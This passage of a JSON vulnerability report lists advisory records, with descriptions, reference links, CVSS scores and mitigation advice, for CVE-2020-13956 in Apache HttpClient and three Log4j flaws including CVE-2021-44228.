-2020-13956","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2021-06-03T23:40:23","ids":[{"system_name":"CVE 
Record","text":"CVE-2020-13956"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Cross-site scripting in Apache HttpClient"},{"category":"details","details":"Vulnerability Details","text":"# Cross-site scripting in Apache HttpClient Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution."}],"product_status":{"known_affected":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"],"known_not_affected":["org.apache.httpcomponents/httpclient@4.5.13"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r03bbc318c81be21f5c8a9b85e34f2ecc741aa804a8e43b0ef2c37749@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r043a75acdeb52b15dd5e9524cdadef4202e6a5228644206acf9363f9@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06cf3ca5c8ceb94b39cd24a73d4e96153b485a7dac88444dd876accb@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a75b8f0f72f3e18442dc56d33f3827b905f2fe5b7ba48997436f5d1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bebe6f9808ac7bdf572873b4fa96a29c6398c90dab29f131f3ebffe@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r12cb62751b35bdcda0ae2a08b67877d665a1f4d41eee0fa7367169e0@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r132e4c6a560cfc519caa1aaee63bdd4036327610eadbd89f76dd5457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2835543ef0f91adcc47da72389b816e36936f584c7be584d2314fac3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2a03dc210231d7e852ef73015f71792ac0fcaca6cccc024c522ef17d@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc7930b43eadc78220d269b79e13ecd387e4bee52db67b2f47d4303@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34178ab6ef106bc940665fd3f4ba5026fac3603b3fa2aefafa0b619d@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34efec51cb817397ccf9f86e25a75676d435ba5f83ee7b2eabdad707@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3cecd59fba74404cbf4eb430135e1080897fb376f111406a78bed13a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3f740e4c38bba1face49078aa5cbeeb558c27be601cc9712ad2dcd1e@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4850b3fbaea02fde2886e461005e4af8d37c80a48b3ce2a6edca0e30@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549ac8c159bf0c568c19670bedeb8d7c0074beded951d34b1c1d0d05@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r55b2a1d1e9b1ec9db792b93da8f0f99a4fd5a5310b02673359d9b4d1@%3Cdev.drill.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/r5b55f65c123a7481104d663a915ec45a0d103e6aaa03f42ed1c07a89@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5de3d3808e7b5028df966e45115e006456c4e8931dc1e29036f17927@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5fec9c1d67f928179adf484b01e7becd7c0a6fdfe3a08f92ea743b90@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63296c45d5d84447babaf39bd1487329d8a80d8d563e67a4b6f3d8a7@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r69a94e2f302d1b778bdfefe90fcb4b8c50b226438c3c8c1d0de85a19@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a3cda38d050ebe13c1bc9a28d0a8ec38945095d07eca49046bcb89f@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6d672b46622842e565e00f6ef6bef83eb55d8792aac2bee75bff9a2a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6dab7da30f8bf075f79ee189e33b45a197502e2676481bb8787fc0d7%40%3Cdev.hc.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6eb2dae157dbc9af1f30d1f64e9c60d4ebef618f3dce4a0e32d6ea4d@%3Ccommits.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70c429923100c5a4fae8e5bc71c8a2d39af3de4888f50a0ac3755e6f@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r87ddc09295c27f25471269ad0a79433a91224045988b88f0413a97ec@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r8aa1e5c343b89aec5b69961471950e862f15246cb6392910161c389b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9e52a6c72c8365000ecd035e48cc9fee5a677a150350d4420c46443d@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra539f20ef0fb0c27ee39945b5f56bf162e5c13d1c60f7344dab8de3b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8bc6b61c5df301a6fe5a716315528ecd17ccb8a7f907e24a47a1a5e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad6222134183046f3928f733bf680919e0c390739bfbfe6c90049673@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rae14ae25ff4a60251e3ba2629c082c5ba3851dfd4d21218b99b56652@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb4ba262d6f08ab9cf8b1ebbcd9b00b0368ffe90dad7ad7918b4b56fc@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb725052404fabffbe093c83b2c46f3f87e12c3193a82379afbc529f8@%3Csolr-user.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0863892ccfd9fd0d0ae10091f24ee769fb39b8957fe4ebabfc11f17@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3739e0ad4bcf1888c6925233bfc37dd71156bbc8416604833095c42@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc505fee574fe8d18f9b0c655a4d120b0ae21bb6a73b96003e1d9be35@%3Cissues.solr.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/rc5c6ccb86d2afe46bbd4b71573f0448dc1f87bbcd5a0d8c7f8f904b2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc990e2462ec32b09523deafb2c73606208599e196fa2d7f50bdbc587@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcced7ed3237c29cd19c1e9bf465d0038b8b2e967b99fc283db7ca553@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd9ad5dda60c82ab0d0c9bd3e9cb1dc740804451fc20c7f451ef5cc4@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5ab56beb2ac6879f6ab427bc4e5f7691aed8362d17b713f61779858@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re504acd4d63b8df2a7353658f45c9a3137e5f80e41cf7de50058b2c1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea3dbf633dde5008d38bf6600a3738b9216e733e03f9ff7becf79625@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ree942561f4620313c75982a4e5f3b74fe6f7062b073210779648eec2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reef569c2419705754a3acf42b5f19b2a158153cef0e448158bc54917@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf03228972e56cb4a03e6d9558188c2938078cf3ceb23a3fead87c9ca@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rf43d17ed0d1fb4fb79036b582810ef60b18b1ef3add0d5dea825af1e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf4db88c22e1be9eb60c7dc623d0528642c045fb196a24774ac2fa3a3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf7ca60f78f05b772cc07d27e31bcd112f9910a05caf9095e38ee150f@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb35f6db9ba1f1e061b63769a4eff5abadcc254ebfefc280e5a0dcf1@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfbedcb586a1e7dfce87ee03c720e583fc2ceeafa05f35c542cecc624@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc00884c7b7ca878297bffe45fcb742c362b00b26ba37070706d44c3@%3Cissues.hive.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"NetApp Advisory ntap-20220210-0002","url":"https://security.netapp.com/advisory/ntap-20220210-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"]}],"title":"CVE-2020-13956/pkg:maven/org.apache.httpcomponents/httpclient@4.5.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45046"]}],"cve":"CVE-2021-45046","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-14T18:01:28","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45046"},{"system_name":"GitHub Advisory","text":"GHSA-jfh8-c2jp-5v3q"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5022"},{"system_name":"Gentoo Advisory","text":"glsa-202310-16"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens 
Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Incomplete fix for Apache Log4j vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Incomplete fix for Apache Log4j vulnerability # Impact The fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack. ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. # Mitigation Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. 
Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/18/1"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-jfh8-c2jp-5v3q","url":"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"Gentoo Advisory glsa-202310-16","url":"https://security.gentoo.org/glsa/202310-16"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Cve 2021","url":"https://www.cve.org/CVERecord?id=CVE-2021-44228"},{"summary":"Debian Advisory dsa-5022","url":"https://www.debian.org/security/2021/dsa-5022"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":9.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]}],"title":"CVE-2021-45046/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44832"]}],"cve":"CVE-2021-44832","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-04T16:14:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-44832"},{"system_name":"Apache Advisory","text":"LOG4J2-3293"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220104-0001"},{"system_name":"Siemens Advisory","text":"ssa-784507"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"Improper Input Validation and Injection in Apache 
Log4j2"},{"category":"details","details":"Vulnerability Details","text":"# Improper Input Validation and Injection in Apache Log4j2 Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. This issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.4"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/28/1"},{"summary":"Siemens Advisory ssa-784507","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf"},{"summary":"Apache Advisory LOG4J2-3293","url":"https://issues.apache.org/jira/browse/LOG4J2-3293"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"NetApp Advisory ntap-20220104-0001","url":"https://security.netapp.com/advisory/ntap-20220104-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"]}],"title":"CVE-2021-44832/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44228"]}],"cve":"CVE-2021-44228","cwe":{"id":"20","name":"Improper Input 
Validation"},"discovery_date":"2021-12-10T00:40:56","ids":[{"system_name":"Twitter Advisory","text":"1469345530182455296"},{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-44228"},{"system_name":"GitHub Advisory","text":"GHSA-7rjr-3q55-vv33"},{"system_name":"Apple Advisory","text":"HT213189"},{"system_name":"Apache Advisory","text":"LOG4J2-3198"},{"system_name":"Apache Advisory","text":"LOG4J2-3201"},{"system_name":"Apache Advisory","text":"LOG4J2-3214"},{"system_name":"Apache Advisory","text":"LOG4J2-3221"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Bentley Advisory","text":"be-2022-0001"},{"system_name":"Apache Advisory","text":"changes-report"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"lookups"},{"system_name":"Microsoft Advisory","text":"microsofts-response-to-cve-2021-44228-apache-log4j2"},{"system_name":"Apache Advisory","text":"migration"},{"system_name":"NetApp Advisory","text":"ntap-20211210-0007"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Resource Consumption","title":"Additional CWE: 400"},{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language 
Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Remote code injection in Log4j"},{"category":"details","details":"Vulnerability Details","text":"# Remote code injection in Log4j # Summary Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. As per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default. Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory. # Impact Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. # Affected versions Any Log4J version prior to v2.15.0 is affected to this specific issue. The v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible. ## Security releases Additional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3 ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. 
The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. # Remediation Advice ## Updated advice for version 2.16.0 The Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0). Even in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33). Users who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221). Please note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. 
